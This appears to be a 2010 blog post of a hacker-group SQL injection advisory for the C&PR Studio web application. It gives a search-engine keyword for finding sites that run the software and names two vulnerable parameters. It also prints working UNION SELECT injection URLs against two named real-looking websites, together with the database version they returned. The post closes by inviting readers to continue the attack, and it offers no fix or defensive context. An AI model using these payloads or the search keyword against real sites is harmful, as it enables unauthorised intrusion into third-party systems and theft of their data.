26 Kasım 2010 Cuma

C&PR Studio <= (index.php) SQL Injection Vulnerability

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[~] HomePage : http://h4x0resec.blogspot.com
[~] Reference : http://h4x0resec.blogspot.com
[~] Special Thanks : DaiMon,BARCOD3 and H4X0RE SECURITY
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : C&PR Studio
|~Price : N/A
|~Version : N/A
|~Software: http://www.cprstudio.com/
|~Vulnerability Style : SQL Injection
|~Vulnerability Dir : /
|~sqL : MysqL 
|~Google Keyword : "Powered by C&PR"
|[~]Date : "26.11.2010"
|[~]Tested on : (L):Vista (R):APACHE PHP/5.2.13 MySQL 5
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Demos: 
http://www.europartners.al
http://www.tjetervizion.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ===============================================================
    |{~~~~~~~~ Explotation| index.php ngoid&cid SQL Injection~~~~~~~~~~~}|
    
    http://$Site/$path/index.php?ep=ngo_det&ngoid=1 {SQL Injection}
    http://$Site/$path/index.php?faqe=list&cid=2 {SQL Injection}
     
    Ex; http://www.europartners.al/
    
    [~] SQL Injecting
    http://www.europartners.al/index.php?ep=ngo_det&ngoid=1%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14
    [~] MySQL writes : 5.1.51 
    
    Ex 2 ; http://www.europartners.al/
    
    [~] SQL Injecting
    http://www.tjetervizion.org/index.php?faqe=list&cid=2%20union%20select%201,2,version%28%29,4,5
    [~] MySQL writes : 5.1.51
     
    To your continue..

    =============================================================
    gOODLuck;)

Hiç yorum yok:

Yorum Gönder